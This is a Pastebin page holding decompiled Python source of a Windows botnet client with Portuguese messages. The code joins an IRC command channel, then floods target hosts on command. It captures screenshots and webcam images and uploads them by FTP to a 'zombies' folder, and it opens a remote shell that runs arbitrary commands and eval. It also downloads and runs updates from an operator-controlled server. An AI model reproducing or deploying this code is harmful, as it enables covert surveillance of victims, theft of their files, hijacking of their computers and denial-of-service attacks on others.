Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Embedded file name: C:\Python27\PyInstaller-2.1\clasp\build\clasp\out00-PYZ.pyz\prompt
- from twisted.internet.protocol import ClientFactory
- from twisted.protocols.basic import NetstringReceiver
- from twisted.words.protocols.irc import IRCClient
- from twisted.internet import reactor
- import time, ImageGrab, VideoCapture, ftplib, win32api, psutil
- import config
- import random
- import socket
- from threading import Thread
- from subprocess import Popen
- import datetime
- import os
- import urllib2
- import zipfile
- import hashlib
- import _winreg
- from traceback import format_exc
- version = '3.2'
- pcid = None
- debugfilepath = '%s\\debug.log' % config.malware_folder
- _download = config.main_exe_link
- _root_key = 'HKEY_CURRENT_USER'
- _key = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
- _exename = config.malware_exe
- _exepath = config.malware_folder[3:]
- rundir = '%s' + _exepath
- rundir = rundir % os.getcwd()[:3]
- def emergency():
- links = ('ftp://%s:%s/ftproot/emergency.dat' % (config.ftp_ip, config.ftp_port), 'http://pastebin.com/raw.php?i=93kWZuiM')
- emergency_data = None
- for link in links:
- try:
- emergency_data = urllib2.urlopen(link).read()
- break
- except:
- return
- if not emergency_data:
- return
- else:
- emergency_data = emergency_data.strip('\n')
- emergency_data = emergency_data.replace('\r', '')
- emergency_data = emergency_data.split('\n')
- emergency_dic = {}
- for item in emergency_data:
- keyvalue = item.split('=')
- emergency_dic[keyvalue[0]] = keyvalue[1]
- if emergency_dic['update'] != 'None':
- if emergency_dic['md5'] != checksum(config.malware_path):
- update_program(emergency_dic['update'])
- return
- def update_program(url):
- try:
- reactor.stop()
- except:
- pass
- Popen(['%s\\updater.exe' % config.malware_folder, str(os.getpid()), url])
- while True:
- time.sleep(999)
- def print_debug(string):
- if config.DEBUG:
- print string
- def log_debugfile(string):
- write(debugfilepath, string + '\n')
- def write(path, data):
- if not os.path.isfile(path):
- all = ''
- else:
- f = open(path, 'r')
- all = f.read()
- f.close()
- f = open(path, 'w')
- f.write(all + data)
- f.close()
- def copyfile(origem, destino):
- nome = origem.split('\\')[-1]
- org = open(origem, 'rb')
- orgread = org.read()
- dest = open(destino + '\\' + nome, 'wb')
- dest.write(orgread)
- dest.close()
- org.close()
- def change_pcid(new_pcid = None):
- global pcid
- idpath = '%s\\id.txt' % config.malware_folder
- if new_pcid:
- pcid = new_pcid
- file = open(idpath, 'w')
- file.write(pcid)
- file.close()
- elif os.path.isfile(idpath):
- file = open(idpath)
- pcid = file.read()
- file.close()
- else:
- pcid = socket.gethostname() + '_'
- for i in range(4):
- pcid += str(random.randint(0, 9))
- file = open(idpath, 'w')
- file.write(pcid)
- file.close()
- def checksum(file):
- check = hashlib.md5()
- check.update(open(file, 'rb').read())
- return check.hexdigest()
- def send_debuglog(protocol, debug_request):
- code, pcs = debug_request.split(':', 1)
- pcs = pcs.split(':')
- if code not in protocol.debug_request_codes:
- if pcid in pcs or 'ALL' in pcs:
- uploadftp(debugfilepath)
- protocol.debug_request_codes.append(code)
- def ss():
- path = rundir + '\\ss.jpg'
- img = ImageGrab.grab()
- img.save(path, 'JPEG')
- uploadftp(path)
- os.remove(path)
- def zip_folder(folder_path, output_path):
- parent_folder = os.path.dirname(folder_path)
- contents = os.walk(folder_path)
- zip_file = zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED)
- for root, folders, files in contents:
- for folder_name in folders:
- absolute_path = os.path.join(root, folder_name)
- relative_path = absolute_path.replace(parent_folder + '\\', '')
- zip_file.write(absolute_path, relative_path)
- for file_name in files:
- absolute_path = os.path.join(root, file_name)
- relative_path = absolute_path.replace(parent_folder + '\\', '')
- zip_file.write(absolute_path, relative_path)
- zip_file.close()
- def download(url, path):
- download = urllib2.urlopen(url)
- f = open(path + '\\' + url.split('/')[-1], 'wb')
- f.write(download.read())
- f.close()
- def uploadftp(path):
- ftp = ftplib.FTP()
- ftp.connect(config.ftp_ip, config.ftp_port)
- ftp.login(config.ftp_user, config.ftp_pass)
- ftp.cwd('ftproot/zombies')
- dirlist = []
- ftp.retrlines('LIST', dirlist.append)
- ok = 0
- for f in dirlist:
- if f.split()[-1] == pcid:
- ok = 1
- if ok == 0:
- ftp.mkd(pcid)
- ftp.cwd(pcid)
- f = open(path, 'rb')
- ftp.storbinary('STOR ' + path.split('\\')[-1], f)
- f.close()
- ftp.quit()
- def deldir(path):
- for item in os.listdir(path):
- if os.path.isdir(path + '\\' + item):
- deldir(path + '\\' + item)
- else:
- os.remove(path + '\\' + item)
- os.rmdir(path)
- class DDoS(Thread):
- def start(self, host, port, protocol):
- self.host = host
- self.port = port
- self.protocol = protocol
- Thread.start(self)
- def run(self):
- packet = 'a' * 1024
- while self.protocol.ddosing:
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((self.host, self.port))
- while True:
- sock.send(packet)
- except socket.error:
- pass
- class SS_Stream(Thread):
- def start(self, interval, obj):
- self.interval = interval
- self.obj = obj
- Thread.start(self)
- def run(self):
- while self.obj.ss_stream:
- try:
- ss()
- except:
- pass
- else:
- time.sleep(self.interval)
- class IRCProtocol(IRCClient):
- channel = config.irc_channel
- ddosing = False
- updating = False
- force_updating = False
- auth = []
- def __init__(self):
- self.nickname = pcid
- def irc_RPL_NAMREPLY(self, prefix, params):
- self.got_names(params[1], params[3].split())
- def got_names(self, channel, names):
- pass
- def parse_topic(self, key):
- dic = {}
- data = self.irc_topic.split(',')
- for chave in data:
- dic[chave.split('|')[0]] = chave.split('|')[1]
- if dic.has_key(key):
- return dic[key]
- def signedOn(self):
- self.join(self.channel)
- def topicUpdated(self, user, channel, newtopic):
- print_debug('topic updated')
- if channel.lower() != self.channel.lower():
- return
- self.irc_topic = newtopic
- if self.parse_topic('md5') != checksum(config.malware_path):
- if not config.DEBUG:
- self.updating = True
- self.quit('Updating...')
- def privmsg(self, user, channel, message):
- print_debug('user: ' + user)
- print_debug('message: ' + message)
- if message == '!ping':
- s_user = user.split('!')[0]
- if channel.startswith('#'):
- self.msg(channel, 'Pong!')
- else:
- self.msg(s_user, 'Pong!')
- if user not in self.auth:
- if message.startswith('!auth '):
- password = message.strip('!auth ')
- hash = hashlib.sha512('NmQs9UnDRNSbK4cn5eSY' + password).hexdigest()
- print_debug(hash)
- if hash == config.auth_hash:
- print_debug('auth completed')
- self.auth.append(user)
- else:
- print_debug('auth ok')
- if message.startswith('!connect'):
- if not channel.startswith('#') or message.strip('!connect') == ' ' + self.nickname:
- fac = ClientFactory()
- fac.protocol = PromptSession
- reactor.connectTCP(config.my_ip_ext, config.my_port, fac)
- if message.startswith('!ddos '):
- command = message.strip('!ddos ')
- if command != 'stop':
- if not self.ddosing:
- ddos_host, ddos_port = command.split(':')
- DDoS().start(ddos_host, ddos_port)
- self.ddosing = True
- else:
- self.ddosing = False
- if message.startswith('!debug '):
- command = message.strip('!debug ')
- if self.nickname in command or command == 'ALL':
- uploadftp(debugfilepath)
- if message.startswith('!update '):
- command = message[8:].split('|')
- if command[0] != checksum(config.malware_path):
- self.force_updating = command[1]
- self.quit('Updating...')
- def alterCollidedNick(self, nickname):
- newnick = nickname + '_'
- return newnick
- def connectionLost(self, reason):
- if self.updating:
- update_program(self.parse_topic('url'))
- if self.force_updating:
- update_program(self.force_updating)
- class IRCFactory(ClientFactory):
- protocol = IRCProtocol
- def clientConnectionLost(self, connector, reason):
- connector.connect()
- clientConnectionFailed = clientConnectionLost
- class CommandHandler():
- path_cmd_args = ('cd', 'dir', 'ls', 'del', 'mkdir', 'read', 'upload', 'exec', 'zip', 'dirsize', 'setname', 'eval')
- env_var = {'%rundir%': rundir}
- init_cwd = os.getcwd()
- def __init__(self):
- self.ss_stream = False
- os.chdir(self.init_cwd)
- def receive_command(self, command, args):
- command = command.lower()
- if command == 'exit':
- return 0
- try:
- func = getattr(self, 'func_%s' % command)
- except AttributeError:
- return 'Comando invalido.'
- try:
- if command in self.path_cmd_args:
- args = '|'.join(args)
- return str(func(args))
- except:
- return format_exc()
- def orglist(self, list):
- output = ''
- for item in list:
- output += item + '\n'
- output = output.strip('\n')
- return output
- def convert_size(self, size):
- def max_len(str, lenght):
- if lenght <= 0:
- lenght = -1
- else:
- lenght += 1
- index = str.find('.')
- if len(str) <= index + lenght:
- return str
- else:
- return str[:index + lenght]
- units = ('B', 'KB', 'MB', 'GB', 'TB')
- final_unit = 0
- current = float(size)
- while current > 1024 and final_unit < len(units) - 1:
- current /= 1024
- final_unit += 1
- return '%s %s' % (max_len(str(current), 2), units[final_unit])
- def func_cd(self, args):
- if args in self.env_var.keys():
- os.chdir(self.env_var[args])
- elif args:
- if os.path.isdir(args):
- if not os.path.isabs(args):
- args = os.path.abspath(args)
- else:
- return 'Diretorio invalido.'
- os.chdir(args)
- else:
- path = os.getcwd().split('\\')
- os.chdir('\\'.join(path[:-1]))
- return ''
- def func_dir(self, args):
- if args:
- if os.path.isdir(args):
- path = args
- else:
- return 'Diretorio invalido.'
- else:
- path = os.getcwd()
- dirs = []
- files = []
- for item in os.listdir(path):
- abspath = path + '\\' + item
- if os.path.isdir(abspath):
- dirs.append(item)
- elif os.path.isfile(abspath):
- files.append('%s %s' % (item, self.convert_size(os.path.getsize(abspath))))
- dirs = sorted(dirs)
- files = sorted(files)
- return self.orglist(dirs + files)
- def func_del(self, args):
- if os.path.isfile(args):
- os.remove(args)
- elif os.path.isdir(args):
- deldir(args)
- else:
- return 'Arquivo/diretorio inexistente.'
- return 'Deletado.'
- def func_mkdir(self, args):
- os.mkdir(args)
- return 'Diretorio criado.'
- def func_read(self, args):
- f = open(args)
- data = f.read()
- f.close()
- return data
- def func_run(self, args):
- Popen(args)
- return 'Executado.'
- def func_upload(self, args):
- Thread(target=uploadftp, args=(args,)).start()
- return 'Uploading.'
- def func_download(self, args):
- if len(args) == 1:
- Thread(target=download, args=(args[0], os.getcwd())).start()
- elif len(args) > 1:
- path = '|'.join(args[1:])
- Thread(target=download, args=(args[0], path)).start()
- return 'Downloading.'
- def func_copy(self, args):
- copyfile(args[0], args[1])
- return 'Copiado.'
- def func_move(self, args):
- self.func_copy(args)
- os.remove(args[0])
- return 'Movido.'
- def func_ss(self, args):
- ss()
- return 'Printed.'
- def func_ping(self, args):
- return 'Pong.'
- def func_version(self, args):
- return version
- def func_pcname(self, args):
- return pcid
- def func_exec(self, args):
- exit_code = os.system(args)
- if exit_code == 0:
- return 'Executado.'
- else:
- return exit_code
- def func_proclist(self, args):
- proclist = []
- for proc in psutil.get_process_list():
- proclist.append('%s = %s' % (proc.name, proc.pid))
- return self.orglist(proclist)
- def func_kill(self, args):
- psutil.Process(int(args[0])).kill()
- return 'Killed.'
- def func_camss(self, args):
- path = rundir + '\\camss.jpg'
- cam = VideoCapture.Device()
- cam.saveSnapshot(path, timestamp=3, boldfont=1)
- uploadftp(path)
- os.remove(path)
- return 'Done.'
- def func_zip(self, args):
- zip_folder(args, '%s\\%s.zip' % (rundir, args.split('\\')[-1]))
- return 'Compactado.'
- def func_extract(self, args):
- zip_file = zipfile.ZipFile(args, 'r')
- extractdir = '%s\\%s' % (rundir, args.split('\\')[-1][:-4])
- os.mkdir(extractdir)
- zip_file.extractall(extractdir)
- zip_file.close()
- return 'Extraido.'
- def func_drives(self, args):
- drives = win32api.GetLogicalDriveStrings().split('\x00')
- if '' in drives:
- drives.remove('')
- drives_out = []
- for drive in drives:
- try:
- os.listdir(drive)
- except:
- pass
- else:
- drives_out.append(drive)
- return self.orglist(drives_out)
- def func_dirsize(self, args):
- if args:
- folder = args
- else:
- folder = os.getcwd()
- folder_size = 0
- for path, dirs, files in os.walk(folder):
- for file in files:
- filename = path + '\\' + file
- folder_size += os.path.getsize(filename)
- return self.convert_size(folder_size)
- def func_ss_stream(self, args):
- if not len(args):
- stream_state = {True: 'ON',
- False: 'OFF'}
- out = 'Stream: %s' % stream_state[self.ss_stream]
- elif args[0] == '1':
- if not self.ss_stream:
- self.ss_stream = True
- interval = 0
- if len(args) > 1:
- interval = int(args[1])
- SS_Stream().start(interval, self)
- return 'Stream: ON'
- else:
- return 'Already on.'
- elif args[0] == '0':
- self.ss_stream = False
- return 'Stream: OFF'
- def func_setname(self, args):
- change_pcid(args)
- return 'Changed: %s' % pcid
- def func_eval(self, args):
- if args:
- return eval(args)
- else:
- return 'No arguments.'
- func_ls = func_dir
- func_print = func_ss
- class PromptSession(NetstringReceiver):
- def __init__(self):
- self.cmd_handler = CommandHandler()
- def stringReceived(self, string):
- input_list = string.split('|')
- cmd = input_list[0]
- cmd_args = input_list[1:]
- out = self.cmd_handler.receive_command(cmd, cmd_args)
- if out == 0:
- self.transport.loseConnection()
- return
- self.sendString('%s|%s' % (out, os.getcwd()))
- def connectionMade(self):
- self.sendString('%s|%s' % (pcid, os.getcwd()))
- def connectionLost(self, reason):
- self.cmd_handler.ss_stream = False
- def main():
- if not config.DEBUG:
- emergency()
- print_debug('checkando pcid')
- change_pcid()
- print_debug('checkando debuglog')
- if not os.path.isfile(debugfilepath):
- log_debugfile('Begin: %s\n' % datetime.datetime.now())
- if not config.DEBUG:
- if not os.path.isfile('%s\\updater.exe' % config.malware_folder):
- download(config.malware_updater_link, config.malware_folder)
- if not os.path.isfile('%s\\helvB08.pil' % config.malware_folder):
- zippath = '%s\\pilfonts.zip' % config.malware_folder
- download(config.pil_link, config.malware_folder)
- zip = zipfile.ZipFile(zippath, 'r')
- zip.extractall(config.malware_folder)
- zip.close()
- os.remove(zippath)
- print_debug('starting twisted')
- reactor.connectTCP(config.irc_server, config.irc_port, IRCFactory())
- reactor.run()
- def core():
- try:
- main()
- except Exception as exc:
- if not config.DEBUG:
- log_debugfile(format_exc())
- uploadftp(debugfilepath)
- emergency()
- raise exc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement